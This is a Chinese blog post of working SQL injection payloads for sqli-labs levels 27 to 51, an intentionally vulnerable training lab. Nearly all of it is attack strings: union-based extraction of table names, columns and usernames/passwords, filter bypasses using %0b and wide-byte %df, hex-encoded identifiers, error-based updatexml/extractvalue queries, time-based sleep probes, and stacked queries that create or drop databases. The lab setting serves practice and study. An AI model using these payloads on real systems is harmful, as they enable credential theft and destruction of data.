sqllibs 27-51关payload

最新推荐文章于 2024-05-07 23:26:14 发布
最新推荐文章于 2024-05-07 23:26:14 发布
阅读量970 收藏 25
点赞数 13
文章标签: 数据库 sql mysql php sqllib sql注入 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46493912/article/details/138245637
版权

目录

前言

Less-27

Less-27a

Less-28

Less-28a

Less-29

Less-30

Less-31

Less-32

Less-33

Less-34(POST)

Less-35

Less-36

Less-37(POST)

Less-38(堆叠注入)

Less-39(堆叠注入)

Less-40(堆叠注入)

Less-41(堆叠注入)

Less-42(堆叠注入,POST)

Less-43(堆叠注入,POST)

Less-44(堆叠注入,POST)

Less-45(堆叠注入,POST)

Less-46(报错注入)

Less-47(报错注入)

Less-48(爆破注入)

Less-49(爆破注入)

Less-50(报错注入、堆叠注入)

Less-51

前言

方法不止一种,在此只列出部分方法。

Less-27

查库名

?id='%0b uNion%0bsElect%0b 1,database(),3 %0b or'

查表名

?id='%0b uNion%0bsElect%0b 1,(sElect%0bgroup_concat(table_name) from (information_schema.tables) where (table_schema='security')),3 %0b or'

查列名

?id='%0b uNion%0bsElect%0b 1,(sElect%0bgroup_concat(column_name) from (information_schema.columns) where (table_name='users')),3 %0b or'

查用户名、密码

?id='%0b uNion%0bsElect%0b 1,(sElect%0bconcat(username,'==',password)%0bfrom%0busers%0blimit%0b0,1),3 %0b or'

Less-27a

查库名

?id=0%22%0BuNion%0B%20sElect%0B1,database(),3%0Bor%22

查表名

?id=0%22%0BuNion%0B%20sElect%0B1,(sElect%0bgroup_concat(table_name)%20from%20(information_schema.tables)%20where%20(table_schema=%27security%27)),3%0Bor%22

查列名

?id=0%22%0BuNion%0B%20sElect%0B1,(sElect%0bgroup_concat(column_name)%20from%20(information_schema.columns)%20where%20(table_name=%27users%27)),3%0Bor%22

查用户名、密码

?id=0%22%0BuNion%0B%20sElect%0B1,(sElect%0bconcat(username,%27==%27,password)%0bfrom%0busers%0blimit%0b0,1),3%0Bor%22
 

Less-28

查库名

?id=0') %0bunion%0bselect%0b1,database(),3%0bor('

查表名

?id=0') %0bunion%0bselect%0b1,(select%0bgroup_concat(table_name) from (information_schema.tables) where (table_schema='security')),3%0bor('

查列名

?id=0') %0bunion%0bselect%0b1,(select%0bgroup_concat(column_name) from (information_schema.columns) where (table_name='users')),3%0bor('

查用户名、密码

?id=0') %0bunion%0bselect%0b1,(select%0bconcat(username,'==',password)%0bfrom%0busers%0blimit%0b0,1),3%0bor('

Less-28a

查库名

?id=0') %0bUNIon %0bSELEct %0b1,database(),3%0bor('

查表名

?id=0') %0bunion %0bselect %0b1,(select%0bgroup_concat(table_name) from (information_schema.tables) where (table_schema='security')),3%0bor('

查列名

?id=0') %0bunion %0bselect %0b1,(select%0bgroup_concat(column_name) from (information_schema.columns) where (table_name='users')),3%0bor('

查用户名、密码

?id=0') %0bunion %0bselect %0b1,(select%0bconcat(username,'==',password)%0bfrom%0busers%0blimit%0b0,1),3%0bor('

Less-29

查库名

?id=-1' union select 1,database(),user()--+

查表名

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'--+

查列名

?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'--+

查用户名、密码

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

Less-30

查库名

?id=-1" union select 1,database(),user() --+

查表名

?id=-1" union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+

查列名

?id=-1" union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users' --+

查用户名、密码

?id=-1" union select 1,group_concat(username),group_concat(password) from users  --+

Less-31

查库名

?id=-1") union select 1,database(),3--+

查表名

?id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = 'security'--+

查列名

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

查用户名、密码

?id=-1") union select 1,group_concat(username),group_concat(password) from users --+

Less-32

查库名

?id=-1%df' union select 1,database(),user()--+

查表名

?id=-1%df' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = database() --+

?id=-1%df' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = (0x7365637572697479) --+  

(括号里为"security"的16进制)

查列名

?id= %df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(0x7573657273)--+  

(括号里为"users"16进制)

查用户名、密码

?id=-1%df' union select 1,uname=%df' union select group_concat(username),group_concat(password) from users --+&passwd=&submit=Submit --+

Less-33

Less-33与32一致,32为自定义过滤,33使用addslashes()过滤

Less-34(POST)

查库名

uname=%df' union select database(),user()--+&passwd=&submit=Submit

查表名

uname=%df' union select database(),group_concat(table_name) from information_schema.tables where table_schema =  (0x7365637572697479) --+&passwd=&submit=Submit

查列名
uname=%df' union select database(),group_concat(column_name) from information_schema.columns where table_name=(0x7573657273) --+&passwd=&submit=Submit

查用户名、密码

uname=%df' union select group_concat(username),group_concat(password) from users --+&passwd=&submit=Submit

Less-35

查库名

?id=0 union select 1,database(),user()--+

查表名

?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = (0x7365637572697479)--+

查列名

?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name=(0x7573657273)

查用户名、密码

?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

Less-36

查库名

?id=-1%df' union select 1,database(),user()--+

查表名

?id=-1%df' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = (0x7365637572697479)--+

查列名

?id=-1%df' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name=(0x7573657273)--+

查用户名、密码

?id=-1%df' union select 1,group_concat(username),group_concat(password) from users--+

Less-37(POST)

查库名

uname=-1%df' union select user(),database()-- &passwd=1&submit=Submit

查表名

uname=-1%df' union select user(),group_concat(table_name) from information_schema.tables where table_schema = (0x7365637572697479)-- &passwd=1&submit=Submit

查列名

uname=-1%df' union select user(),group_concat(column_name) from information_schema.columns where table_name=(0x7573657273)-- &passwd=1&submit=Submit

查用户名、密码

uname=-1%df' union select group_concat(username),group_concat(password) from users-- &passwd=1&submit=Submit

Less-38(堆叠注入)

?id=-1' ;CREATE TABLE cooper like users--+
?id=-1';CREATE DATABASE cooper--+

(创建库cooper,创建表cooper)

Less-39(堆叠注入)

与38相同,闭合不同,id=1

Less-40(堆叠注入)

与38相同,闭合不同,id=1')

Less-41(堆叠注入)

与38相同,闭合不同,id=1,错误不回显

Less-42(堆叠注入,POST)

login_user=admin&login_password=1';drop database cooper--+&mysubmit=Login

(user有过滤)

Less-43(堆叠注入,POST)

与42相同,1')闭合

Less-44(堆叠注入,POST)

与42相同

Less-45(堆叠注入,POST)

与43相同

Less-46(报错注入)

?sort=1 and updatexml(1,(concat(0x7e,database(),0x7e)),1)--+

Less-47(报错注入)

与46相同,'闭合

?sort=1' and extractvalue(1,concat(0x7e,database(),0x7e))--+

Less-48(爆破注入)

?sort=1 and if(length(database())>1,0,sleep(5))--+

Less-49(爆破注入)

与48一致,'闭合

?sort=1' and if(length(database())=8,sleep(5),0)--+

Less-50(报错注入、堆叠注入)

?sort=1 and extractvalue(1,concat(0x7e,database(),0x7e))--+  (报错注入)
?sort=1;create database cooper;--+   (堆叠注入,创建库)

Less-51

与50一致,'闭合

?sort=1';drop database cooper;--+

_Cooper_
关注
  • 13
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Simple-Header-Payload-crx插件
03-24
文档:https://www.camya.com/simple-header-payload-browser-extension/功能-支持主机名以及IPv4和IPv6地址。 -添加自定义HTTP标头名称/值对或将值附加到User-Agent。 -激活和停用的条目。 -突出显示匹配的主机条目...
log4j-rce-payload
04-15
经测试验证可用lport1389,userip是攻击ip即payload存放地,webport攻击机闲置可访问的web端口,执行成功反弹即显示Send LDAP reference result for a redirecting to http://xxx:xx/Exploit.class Send me:xxx属于...
payload-dumper-go.exe
10-30
payload.bin文件分解比市面上那些PY分解速度快一倍,执行命令在CMD执行payload-dumper-go payload.bin,输出目录和单独提取某个IMG都可以设置,输出目录-o,单独输出某个IMG是-P就能得到分解.小米11分解payload.bin...
draft-ietf-payload-rtp-h265-15.pdf
06-27
H265的网络抽象层RTP封装技术说明
Redis 实战之压缩列表
奔走的蚂蚁的博客
05-04 1005
压缩列表是一种为节约内存而开发的顺序型数据结构。压缩列表被用作列表键和哈希键的底层实现之一。压缩列表可以包含多个节点,每个节点可以保存一个字节数组或者整数值。添加新节点到压缩列表, 或者从压缩列表中删除节点, 可能会引发连锁更新操作, 但这种操作出现的几率并不高。
java线上问题排查之磁盘和网络查看分析(二)
wayne_youlu的博客
04-30 539
overflowed 标识全连接队列溢出的次数,最前面是0,标识没有队列溢出的情况,网络环境正常。来查看网络是否连接。如果出现下图内容,则证明网络已经连接。
力扣数据库题库学习(5.7日)--1757. 可回收且低脂的产品
Jesse_Kyrie的博客
05-07 268
这个问题要求的筛选条件很简单,只需要简单的WHERE语句即可 **WHERE low_fats = "Y" AND recyclable="Y";** 太简单了,简直侮辱我的智商。。扛不住😕😕😕
(论文阅读-优化器)EFFICIENCY IN THE COLUMBIA DATABASE QUERY OPTIMIZER
junerli的博客
05-06 783
查询优化是一个数据库系统能够获得重要性能收益的领域。现代数据库应用通常要求优化器具有高可扩展性和效率。Columbia基于Cascades优化框架的自顶向下优化算法,通过对搜索空间结构和搜索算法的精心重构,简化了自顶向下优化器的设计。
Study--Oracle-02-单实例部署Oracle19C
最新发布
weixin_41633010的博客
05-07 546
路虽远行则将至,事虽难做则必成! 滴水穿石,聚沙成塔! 感谢CSDN各位大佬的经典博文,在迷茫时能够拨云见日,指点迷津,让我继续一路前行! 如有侵权,请留言,我及时删除
如何用Jmeter压测
howard1209a的博客
05-06 327
可以从清华源下载,我下的是 5.6.3 版本。bin 目录打开终端,输入 Jmeter 运行Options 点 Choose language 选择中文。
Linux软件安装
qq_65463941的博客
05-02 684
在Linux中编译安装软件通常需要执行以下几个步骤:下载源代码包可以从软件的官网、github等网下载解压源代码包进入软件包源代码目录在解压后得到的目录中,通常会有一个README文件、INSTALL、SETUP文件,其中描述了如何编译和安装软件执行configure脚本大多数软件包都包含了一个configure脚本,用于检测系统环境,并生成Makefile文件,Makefile文件包含了编译和安装软件所需的所有信息,执行./configure命令即可执行make命令。
TIPS:MySQL按给定时间间隔分组统计
乐只悠悠
05-01 368
MySQL按给定时间间隔分组统计......
docker desktop实战部署oracle篇
轻松入门网
05-05 1086
快速部署oracle数据库
Postgresql源码(127)投影ExecProject的表达式执行分析
InternalsOf
04-30 868
无论是投影还是别的计算,表达式执行的入口和计算逻辑都是统一的,这里已投影为分析表达式执行的流程。
TiDB系列之:部署TiDB集群常见报错解决方法
zhengzaifeidelushang的博客
04-30 891
客户端DBeaver方式登陆TiDB数据库。命令行方式登陆TiDB数据库。
小区服务|基于SprinBoot+vue的小区服务管理系统(源码+数据库+文档)
weixin_66413741的博客
05-01 1151
这次开发的小区服务管理系统对安保管理、安保分配管理、客服聊天管理、字典管理、房屋管理、反馈管理、论坛管理、公告管理、反馈处理管理、住户管理、员工管理、管理员管理等进行集中化处理。经过前面自己查阅的网络知识,加上自己在学校课堂上学习的知识,决定开发系统选择B/S模式这种高效率的模式完成系统功能开发。这种模式让操作员基于浏览器的方式进行网站访问,采用的主流的Java语言这种面向对象的语言进行小区服务管理系统程序的开发,在数据库的选择上面,选择功能强大的Mysql数据库进行数据的存放操作。
公考学习平台|基于SprinBoot+vue的公考学习平台(源码+数据库+文档)
weixin_66413741的博客
04-30 1399
本共享汽车管理系统有管理员和用户。管理员功能有个人中心,用户管理,投放地区管理,汽车信息管理,汽车投放管理,汽车入库管理,使用订单管理,汽车归还管理。用户可以在注册登录,可以对汽车进行使用产生订单,还可以归还。因而具有一定的实用性。本站是一个B/S模式系统,采用Spring Boot框架,MYSQL数据库设计开发,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得共享汽车管理系统管理工作系统化、规范化。
mysql锁
java搬运工
05-03 724
根据优化2, 这是一个等值查询, 向右查找到了不满足条件的行, 所以会退化成(c=10,id=10) 到 (c=15,id=15)的间隙锁。因为扫描到id=15, 就可以确定不用往后再找了。2. 同时根据优化2, 这是一个等值查询(id=7), 而id=10不满足查询条件, next-keylock退化成间隙锁, 因此最终加锁的范围是(5,10)。这里你需要注意一点, 首次session A定位查找id=10的行的时候, 是当做等值查询来判断的, 而向右扫描到id=15的时候, 用的是范围查询判断。
MySQL增删查改(进阶)
weixin_74235506的博客
05-04 746
创建班级表, id和name, 其中id为主键, 创建学生表, id, name和 classId, 一个学生对应一个班级, 一个班级对应多个学生, id为主键, classId为外键 其中class表称为父表. student表 称为子表。笛卡尔积通过排列组合得到更大的表, 笛卡尔积的列数就是两个表的列数相加, 笛卡尔积的行数就是两个表的行数相乘.(其中有的数据是无意义的, 需要通过一个条件(连接条件)把有意义的数据筛选出来)
react-smooth-dnd 获取payload
05-24
React Smooth DnD 是一个 React 库,用于实现平滑拖拽效果。如果你想获取拖拽元素的 payload,可以使用 `onDragBegin` 回调函数。 例如,你可以在拖拽开始时通过 `onDragBegin` 回调函数获取拖拽元素的 payload,如下所示: ```jsx import { useDrag } from 'react-smooth-dnd'; function MyDraggableComponent(props) { const { data } = props; const onDragBegin = () => { return data; // 返回拖拽元素的 payload }; const { ref } = useDrag({ payload: data, onDragBegin }); return ( <div ref={ref}> {data} </div> ); } ``` 在上面的例子中,我们将 `data` 作为拖拽元素的 payload,并在 `onDragBegin` 回调函数中返回它。当用户开始拖拽时,React Smooth DnD 将调用 `onDragBegin` 回调函数,并将返回的 payload 传递给拖拽事件处理程序。你可以在拖拽事件处理程序中获取 payload,并根据需要进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值